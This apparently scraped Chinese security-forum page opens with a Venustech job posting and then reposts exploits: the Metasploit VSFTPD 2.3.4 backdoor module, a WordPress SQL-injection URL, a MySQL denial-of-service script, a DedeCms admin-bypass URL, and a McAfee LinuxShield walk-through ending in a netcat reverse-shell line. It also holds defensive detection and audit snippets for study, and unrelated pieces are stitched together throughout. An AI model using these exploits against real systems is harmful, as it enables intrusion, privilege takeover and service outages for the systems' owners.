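[Recruitment] [Hiring] Venustech (启明星辰) R&D hiring

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Resume e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Safety assistant: recruit or apply through the 非安全中国 administrators; QQ group: 57116771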


  • ++++++++++ Venustech details ++++++++++

    Just send me a site message.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled with the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products
    2. Writing, executing and revising product test cases
    3. Product performance testing
    4. Support and testing for external projects

    Requirements:

    1. Basic knowledge of TCP/IP
    2. Solid data-communications fundamentals
    3. Some grounding in Linux
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test-case design, system testing and stress testing
    7. Familiar with how firewalls work, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent or IXIA testers

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering the Trojan detection service and the web vulnerability scanning service
    2. Technical support for service customers
    3. Research on web-page Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and so on
    4. Routine upgrade and maintenance of the security event libraries for IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques; research on the TCP/IP protocols; research on reverse engineering

     

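    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's personal opinion and do not represent this site's position;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" and holds the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Part of this post is reposted from other media and published on this site to pass on more information; this does not mean the site endorses its views or vouches for its accuracy;
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; the site will remove it promptly and offers its sincerest apologies;
    6. This site's administrators and moderators have the right to delete this post without notifying the poster in advance.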

    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5'],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end

    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.
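A defender-side view of the sequence the module above relies on, added here as an example that is not part of the original post or of Metasploit: it flags FTP `USER` arguments containing `:)` and connections to TCP 6200 that follow on the same server. The log line layout, the addresses and the 60-second window are constructed assumptions, and matching `:)` anywhere in the user name rather than only at its end is a deliberate broadening.

```python
import re
from datetime import datetime, timedelta

BACKDOOR_PORT = 6200  # bind-listener port checked by the module above

# Constructed sample (not from the original post): FTP command records and
# connection records merged into one hypothetical line format.
SAMPLE_EVENTS = """\
2011-07-04T10:00:01 ftp 198.51.100.7 -> 192.0.2.10:21 USER anonymous
2011-07-04T10:00:02 ftp 198.51.100.7 -> 192.0.2.10:21 PASS guest@example.org
2011-07-04T10:02:10 ftp 203.0.113.9 -> 192.0.2.10:21 USER a8Xk:)
2011-07-04T10:02:10 ftp 203.0.113.9 -> 192.0.2.10:21 PASS q1
2011-07-04T10:02:11 conn 203.0.113.9 -> 192.0.2.10:6200 ESTABLISHED
2011-07-04T10:05:00 ftp 203.0.113.50 -> 192.0.2.11:21 USER smile:)user
2011-07-04T11:30:00 conn 198.51.100.7 -> 192.0.2.12:6200 ESTABLISHED
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<kind>ftp|conn) (?P<src>\S+) -> "
    r"(?P<dst>[^:\s]+):(?P<port>\d+) (?P<rest>.*)$"
)


def parse_events(text):
    """Parse the hypothetical log format into time-ordered event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not fit the assumed layout
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "kind": m["kind"],
            "src": m["src"],
            "dst": m["dst"],
            "port": int(m["port"]),
            "rest": m["rest"],
        })
    return sorted(events, key=lambda e: e["ts"])


def is_trigger(event):
    """True for an FTP USER command whose argument contains ':)'."""
    if event["kind"] != "ftp":
        return False
    verb, _, arg = event["rest"].partition(" ")
    return verb.upper() == "USER" and ":)" in arg


def detect(events, window=timedelta(seconds=60)):
    """Return (finding, server, client) tuples in event order."""
    findings = []
    last_trigger = {}  # server address -> time of the most recent trigger
    for ev in events:
        if is_trigger(ev):
            last_trigger[ev["dst"]] = ev["ts"]
            findings.append(("smiley-user", ev["dst"], ev["src"]))
        elif ev["kind"] == "conn" and ev["port"] == BACKDOOR_PORT:
            seen = last_trigger.get(ev["dst"])
            if seen is not None and ev["ts"] - seen <= window:
                # Highest confidence: trigger and listener use on one server.
                findings.append(("trigger-then-6200", ev["dst"], ev["src"]))
            else:
                # Lower confidence: port 6200 used with no logged trigger.
                findings.append(("6200-without-trigger", ev["dst"], ev["src"]))
    return findings


if __name__ == "__main__":
    for finding in detect(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

A `smiley-user` hit alone means someone probed for the backdoor; `trigger-then-6200` on the same server is the case that warrants treating the host as compromised.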


    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/

    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 remote denial-of-service vulnerability

    # Python 2 script (uses print statements)
    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    # Two raw MySQL client packets sent back to back after connecting
    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"


    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf


    DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you get straight into the site's admin back end.

    The precondition for this vulnerability is that the admin back-end path must be known.

    Official temporary workaround:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
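Why the replacement filter in the DedeCms post matters, as an added Python model that is not part of the original post or of DedeCms: it rebuilds nested request arrays the way PHP does for bracketed keys and runs both versions of the check against them. The function names, the sample queries and the host `db.example.invalid` are constructed, and only the query string is modelled, not POST or cookie data.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as the PHP filter: '#^(cfg_|GLOBALS)#'
BLOCKED = re.compile(r"^(cfg_|GLOBALS)")
KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\]]*\])*)$")


def php_style_request(query):
    """Build a nested dict the way PHP turns a[b][c]=v into nested arrays."""
    request = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        m = KEY_RE.match(raw_key)
        if m is None:
            path = [raw_key]
        else:
            path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = request
        for part in path[:-1]:
            part = part or str(len(node))  # "[]" appends, as in PHP
            child = node.get(part)
            if not isinstance(child, dict):
                child = node[part] = {}
            node = child
        node[path[-1] or str(len(node))] = value
    return request


def old_filter_allows(request):
    """Original check: only the top-level keys of $_REQUEST are tested."""
    for key in request:
        if len(key) > 0 and BLOCKED.match(key):
            return False
    return True


def new_filter_allows(val):
    """Replacement check: recurse into arrays, testing keys and values."""
    if isinstance(val, dict):
        return all(
            new_filter_allows(k) and new_filter_allows(v)
            for k, v in val.items()
        )
    return not (len(val) > 0 and BLOCKED.match(val))


def compare(query):
    """Return (allowed_by_old_filter, allowed_by_new_filter) for a query."""
    request = php_style_request(query)
    return old_filter_allows(request), new_filter_allows(request)


# Constructed sample queries (not from the original post).
SAMPLES = [
    "dopost=login&userid=admin",                      # ordinary login fields
    "cfg_dbhost=db.example.invalid",                  # flat key: both reject
    "_POST[GLOBALS][cfg_dbhost]=db.example.invalid",  # nested key: old misses
    "note=cfg_is_a_prefix",                           # value match: new rejects
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(q, compare(q))
```

The third sample is the shape used in the URL above: the top-level key is `_POST`, so the original loop never sees `GLOBALS` or `cfg_dbhost`. The last sample shows a side effect of the replacement, which also rejects ordinary values that merely begin with `cfg_` or `GLOBALS`.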

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf


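    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or cause a denial of service.
    1) When a cache backend is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session information. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify that the supplied URL exists and resolves. By default the underlying socket has no timeout set, so an attacker can exploit this by sending specially crafted URLs that consume all server memory, causing a denial of service.
    3) An error exists in the handling of redirect responses when verifying URLs supplied to the "URLField" field type; an attacker can exploit it by returning a redirect response to a "file://" URL, which makes it possible to determine whether local files exist on the server.
    4) An error exists in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses; an attacker can exploit it to carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/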

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our
    anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)


    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---


    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz


    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007


    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
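A configuration audit for the setting the LinuxShield walk-through manipulates, added here as an example that is not part of the advisory or of McAfee's tooling: it parses profile settings in the `key=value` form passed to `sconf ... set` and flags any profile whose `scannerPath` resolves into the update scratch directory or outside a trusted root. The trusted root `/opt/NAI/LinuxShield`, the `libexec/scanner` path and the sample settings are assumptions constructed for illustration.

```python
import posixpath
import re

# Update download directory named in the advisory.
SCRATCH_DIR = "/opt/McAfee/cma/scratch"
# Assumption: legitimate scanner binaries live under the install root that
# the advisory's engine paths point to.
TRUSTED_ROOTS = ("/opt/NAI/LinuxShield",)

KEY_RE = re.compile(r"^nailsd\.profile\.(?P<profile>[^.]+)\.(?P<setting>.+)$")

# Constructed sample settings (not from the advisory), one token per line.
SAMPLE_SETTINGS = """
nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/libexec/scanner
nailsd.profile.ODS_1.scanMaxTmo=301
nailsd.profile.ODS_99.allFiles=true
nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_7.scannerPath=/opt/NAI/LinuxShield/../../McAfee/cma/scratch/update/catalog.z
nailsd.profile.ODS_8.scannerPath=/tmp/scanner
"""


def parse_settings(text):
    """Group whitespace-separated key=value tokens by scan profile name."""
    profiles = {}
    for token in text.split():
        key, sep, value = token.partition("=")
        m = KEY_RE.match(key)
        if not sep or not m:
            continue  # not a nailsd.profile.<name>.<setting>=<value> token
        profiles.setdefault(m["profile"], {})[m["setting"]] = value
    return profiles


def _inside(path, root):
    """True if path is root itself or lies below it."""
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def audit(profiles):
    """Return (profile, finding, resolved_path) for suspicious scannerPath."""
    findings = []
    for name, settings in sorted(profiles.items()):
        raw = settings.get("scannerPath")
        if raw is None:
            continue
        # Collapse "../" segments so a trusted-looking prefix cannot hide
        # a path that really resolves elsewhere.
        path = posixpath.normpath(raw)
        if _inside(path, SCRATCH_DIR):
            findings.append((name, "scannerPath-in-update-scratch", path))
        elif not any(_inside(path, root) for root in TRUSTED_ROOTS):
            findings.append((name, "scannerPath-outside-trusted-root", path))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_settings(SAMPLE_SETTINGS)):
        print(finding)
```

Profile `ODS_7` is the case a plain prefix comparison would pass: its raw value starts with the trusted root but resolves into the scratch directory.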
